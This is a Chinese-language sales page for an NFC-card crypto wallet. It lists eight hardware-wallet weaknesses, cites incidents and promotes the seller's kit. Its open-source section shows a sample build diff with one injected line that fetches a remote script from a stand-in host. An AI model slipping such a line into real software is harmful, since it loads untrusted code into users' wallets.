8个漏洞 开源 清单 常见问题
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS 创建钱包创建
硬件钱包 · 不明显的漏洞

硬件钱包不明显的漏洞

你买设备是为了堵洞。新洞一起到:固件、更新、电脑上的服务、屏幕、包装盒、厂商账号。评测当成优点的八处细节——以及 2020–2026 年通过它们把钱拿走的八种方式。

真实案例附日期与金额 依据厂商文档 套件按同一清单核对
犯错的代价公开案例
2026Coldcard · 固件弱随机$100M+
2025Bybit · 签名人签了看不见的内容$1.5B
2024Dark Skippy · 助记词经两次签名泄露研究
2023Ledger Connect Kit · 库中后门$600K
2021App Store 仿冒钱包应用17,1 BTC
2020Ledger 客户库泄露 · 多年钓鱼27万人
八个漏洞

评测夸的每一处细节,都是单独的破口

硬件钱包堵住一个洞:密钥不再躺在联网手机上。但设备不是空的。它有固件、更新、电脑程序、屏幕、包装盒、拿着你地址的卖家——每一处都新增你以前没有的攻击面。下面八处:评测怎么说、钱怎么被拿走、如何堵上、我们的套件有没有这处。

漏洞 01

生成你密钥的固件

评测里: 「安全芯片——密钥在设备内生成且永不离开」

密钥是巨大的随机数,由固件生成。那里出一次错——实际密钥远少于你以为的:可对所有持有者同时暴力破解,无需接触设备,购后多年仍可。芯片无关;洞在它上面。

案例
$100M+
Coldcard,2026 年 7 月:自 2021 年起的固件构建错误,悄悄把硬件 RNG 换成用设备序列号和定时器播种的弱随机。密钥强度掉到约 40 位;5,000+ 地址被清空。
如何堵上
能否带上自己的随机:掷骰子、自定短语。接受你提供熵的钱包,不依赖固件上的单点错误。
我们没有这处
卡上没有固件——它是加密载体。Mitilena Air 用设备系统 RNG 生成密钥,你也可以自定助记词,而不是随机词。
漏洞 02

你被迫安装的更新

评测里: 「厂商定期发布安全更新」

每次更新都是固件可被替换的窗口。被篡改的固件把助记词碎片藏进两三笔普通签名,外表一切正常。不更新也不行:漏洞正是靠这些更新修的。

案例
2次签名
Dark Skippy,2024 年 8 月:研究者证明恶意硬件钱包固件能通过两笔交易带走整份助记词。从错误来源更新一次就够。
如何堵上
固件从哪来、设备是否校验签名。最好是根本没什么可更新。
我们没有这处
卡上没什么可更新或替换。签名在手机应用里;构建经签名,来自 App Store 和 Google Play——和任何你看得见、自己关掉的应用一样。
漏洞 03 · 感受荒谬
评测里: 「方便的厂商电脑应用」

为不信任而买的钱包,却附带后台服务

你买设备就为一个目的:不再信任电脑。可要让它工作,还得在同一台电脑上装后台服务。不是你写的、不是你启动的、也不是你控制的:它随系统启动,监听本机任何程序都能敲的端口,此刻正在做事——具体做什么,你不知道,也永远查不清。

关掉钱包后它仍在后台跑。一跑就是好几年。某家最大厂商曾是单独的「桥」服务;2025 年藏进了应用本身——服务还在,只是随窗口一起死。对多数其他产品,没有电脑程序设备就是个钥匙扣。Linux 还要加 udev 规则,否则系统不交 USB。

也就是说,你为了不再依赖电脑程序而买的东西,没有电脑程序就用不了。 而且不是你看得见的那个——是跑在它下面的那个。

我们没有这处
电脑上什么都不装:无服务、无驱动、无端口。中介是手机里已有的 NFC 芯片,由手机制造商做、由操作系统管:只有应用打开且你自己贴卡时才工作,手机每次都要权限。卡是被动的:无电池、无射频,自己什么都不做。关掉应用——就没有不经你还能跑的东西。老实说:手机应用仍需要,它和别的应用一样——你看得见、自己打开、自己关掉。杂物间里没人住。
系统监视钱包已关闭
进程状态运行
HW Wallet Appwallet
你已关闭-
hwwalletd后台服务 · USB 桥
运行中412d 06:14
登录时由系统启动关不掉——这是服务
示意;名称仅为举例。这是 2025 年前某款最流行 USB 钱包电脑上的样子;后来「桥」嵌进应用本身——服务还在,只是列表里看不见了。
比喻
为隐私买的房子——杂物间里住着房客

你想要一栋为隐私而买的房子。买了。���来需要安保——装上了。而为了安保套餐生效,他们要你让一个穿制服的人住进杂物间,全天候拿着每扇门的钥匙,还向别人汇报。不是你雇的,也解雇不了,夜里他干什么——你不知道。

他当然「是自己人」。合同这么写。你想要隐私,得到的是替代品:房子里住着你没选过的房客。

漏洞 04 · 开源不是审计
评测里: 「开源——任何人都能验证」

开源是程序员协作的方式,不是程序不偷钱的徽章

开源发明出来,是为了让人分享程序、一起修。当协作工具它很好。它从来不是「这软件不会偷你钱」的质量印章,原因是:你用的不是源码。你用的是下载下来的东西。

GitHub 仓库和手机上的文件之间,还有构建、应用商店、更新、服务器。任一步都可能塞进一行,从任意地方拉任意东西——而仓库里没有它。你无法把副本和源码对照:商店发的是编译文件;网页钱包每次打开拿到的是服务器今天决定给你的代码;浏览器扩展夜里悄悄更新。

「开源」只表示某些人在某天能检查某个版本。 你的副本此刻在干什么——它并不表示。

仓库里 · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
你手机上 · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
构建里多一行。仓库没有,商店看不见,在你设备上跑着。
开源没挡住下面任何一个案例
Ledger Connect Kit2023
GitHub 上的开源库;恶意版本发到 npm;几十个站点几小时内热加载
Copay / event-stream2018
开源钱包;后门经专针对它的依赖进来
xz utils2024
开源二十年;后门藏在发布里,直到一位工程师发现 SSH 登录慢了半秒
Coldcard2026
开源固件;五年构建错误把硬件 RNG 换成弱的——无需接触设备即可暴力破解密钥,5,000+ 地址,$100M+
真正管用的
不是去读别人的代码——而是谁都能做的两项检查。第一,行为审计:在电脑上装拦截代理,让应用走代理,看它往哪发什么。不必读代码——流量全看得见。第二,让代码无可偷的架构:若密钥从不落在联网设备上,任何更新里的任何一行���无能为力——它没什么可发。
我们怎么做
第一项我们自己就提供:把我们的应用走代理,网页版走浏览器 DevTools,逐条看请求。签名密钥和助记词不会出现;唯一例外是 Monero 查看密钥——在「转账如何发出」页说明。第二项在套件里:密钥在无网设备上的 Mitilena Air 中生成,存在卡上,到达在线应用的只有签名——那里没什么可代理。这里的离线是真的:气隙模式下持钥设备什么都不连——无电缆、无蓝牙;交易以你亲眼可见的二维码进出。不是挂在在线电脑上、带着后台服务、交换不知何物的「冷」钱包。
漏洞 05

看不清你在签什么的屏幕

评测里: 「在设备屏幕确认——电脑上的病毒无能为力」

屏幕很小,常常显示哈希或「合约调用」,不是地址和金额。你确认的是看不见的东西——而签名仍是诚实的、你的。屏幕给的是并不存在的掌控感。

案例
$1.5B
Bybit,2025 年 2 月:使用硬件钱包的签名人确认了一笔界面看起来普通的转账。设备显示的是人无法核对的数据。
如何堵上
收款人、金额、操作类型用人话——不是哈希——以及一键拒绝。
我们怎么做
有屏幕,但是手机屏:地址、金额、请求类型用文字——转账、合约调用、授权——还有「拒绝」按钮。大额——用单独的离线设备接收完整交易。
漏洞 06

盒里已经有助记词

评测里: 「密封包装带防拆封条」

实体设备意味着物流、中间商和「打折」电商。钱包到货已预设,盒里纸条上写着助记词。或商店里的仿冒应用要你「输入助记词以激活」。

案例
17,1 BTC
App Store,2021:硬件钱包用户把助记词输入仿冒应用,损失 17.1 BTC。同年数据库泄露后,Ledger 客户收到假设备和信,要求「把助记词迁到新设备」。
如何堵上
自己初始化,永远别用已经写好送来的助记词。封条不是验证;验证是密钥由你生成。
我们怎么做
卡到货是空白的:密钥由你创建并写入——盒里不可能有现成助记词。应用只通过官网链接来自 App Store 和 Google Play;仅在导入和签名时询问助记词。
漏洞 07

厂商账号

评测里: 「官方质保、客服与个人账号」

买设备就要把姓名、邮箱、收货地址交给厂商。你的安全从此依赖他们的数据库。一旦泄露——你会连年收到「在新设备上确认助记词」的消息,有时还带包裹。

案例
27万人
Ledger,2020:27 万买家数据泄露,含邮寄地址。要求「迁移」助记词的邮件、电话和包裹至今仍在。
如何堵上
他们知道得越少,向量越短:无账号购买、从不索要助记词的客服,以及「只有贼才问助记词」的规则。
我们没有这处
钱包无需注册——没有账号。卖家只知道收货地址。客服和应用都不问助记词。
漏洞 08

一台设备和一张纸条

评测里: 「坚固外壳、大屏、续航一周」

零件越多越容易坏:接口、屏幕、电池。恢复全押在一张助记词纸条上——浸湿、搬家弄丢、「以防万一」拍了照。最常见的损失原因不是黑客。

案例
≈20 % BTC
Chainalysis 估计约五分之一比特币永久丢失——主要因丢失密钥,不是黑客。
如何堵上
盒内有几份密钥、什么形态,丢设备怎么办,里面有没有会坏的零件。
我们没有这处
无屏幕、电池、接口——没什么可坏。也不是一份:盒内五份镜像——两张 NFC 卡和三枚防水塑料隐身贴纸,可存 10+ 年。
清单

钱包里不该有什么

对应八个漏洞的八处细节。清单适用于任何钱包——硬件、手机、浏览器。勾选你在选的那个有什么——也勾我们的。

01
仅由程序生成的密钥没有你自己的随机——自定短语或骰子
02
密钥所在处的更新每次更新都是替换代码的机会
03
电脑上的服务、驱动或端口见漏洞 03
04
用「开源」徽章代替架构密钥落在外来代码够得着的地方
05
屏幕显示哈希而非地址和金额且没有「拒绝」按钮
06
已经写好送来的助记词在盒子里、信里、「激活应用」里
07
厂商账号以及可能索要助记词的客服
08
唯一副本和会坏的零件屏幕、电池、接口、一张纸条
按这份清单,Ultimate 套件八处细节一个都没有。盒内:2 张 NFC 卡和 3 枚隐身贴纸、Mitilena Air(无网生成密钥)和 Mitilena Keys(无网签名)。卡到货是空的:密钥由你创建并加密——不是出厂芯片。 配置与价格 →
Ultimate · 离线套件

不是出厂「安全芯片」——而是你自己加密的载体

卡到货是空的。你在无网手机上用 Mitilena Air 生成密钥并自己写入。签名走 Mitilena Keys,同样离线:交易靠二维码传递。盒内五份相同副本:2 张 NFC 卡和 3 枚隐身贴纸,防水塑料。18 条网络、20,000+ 币种,含 USDT。

电脑上什么都不装
无固件、更新、屏幕、电池
交易到离线手机——声音或二维码,无电缆无 USB
配合免费 Mitilena 手机应用
防水塑料,可存 10+ 年
全球配送 · mitilena-store.com
Mitilena NFC 卡
Ultimate · 离线生成与签名
€369€439
2 张 NFC 卡 · 3 枚隐身贴纸 · Mitilena Air · Mitilena Keys 许可
购买 Ultimate · €369 基础版与 Premium — 查看全部方案
常见问题

读到这里的人常问

硬件钱包优缺点,简短版?

一个大优点:密钥不在联网手机上。缺点就是上面八处——每一处都加攻击面。好的硬件钱包是细节更少的那个,不是更多。

如果手机中招了?

主手机贴卡时,密钥只在签名那一秒出现在隔离环境——和任何手机钱包同类风险,只是更短。让你害怕的金额——第二层:在单独离线设备上签名,交易经二维码到达。

卡被偷或丢失怎么办?

没有密码,卡和贴纸就是废塑料——上面的密钥是加密的。丢一份由其余四份顶上:盒内两卡三贴是镜像。

硬件钱包固件必须更新吗?

若厂商修了洞——要更新,而这正是固件可被替换的时刻:核对来源与签名。没有固件的载体没有这种抉择——没什么可更新,也没什么可换。

和 USB 钱包有何不同?

中介更少:无电缆、驱动、后台服务、电脑程序。中介只有一个——手机的 NFC 芯片——它听你和操作系统的,不听钱包厂商的。

开源就等于安全?

意思是某人某时可以检查。你用的不是代码而是下载物,两者无法对照。安全来自架构:密钥不在外来代码够得着的地方。

支持离线生成与签名的 NFC 卡

5 份密钥副本 · Air · Keys · 或 30 秒免费钱包 · 为何芯片上的「硬件冷钱包」常常是假的 →
购买 Ultimate · €369 创建免费钱包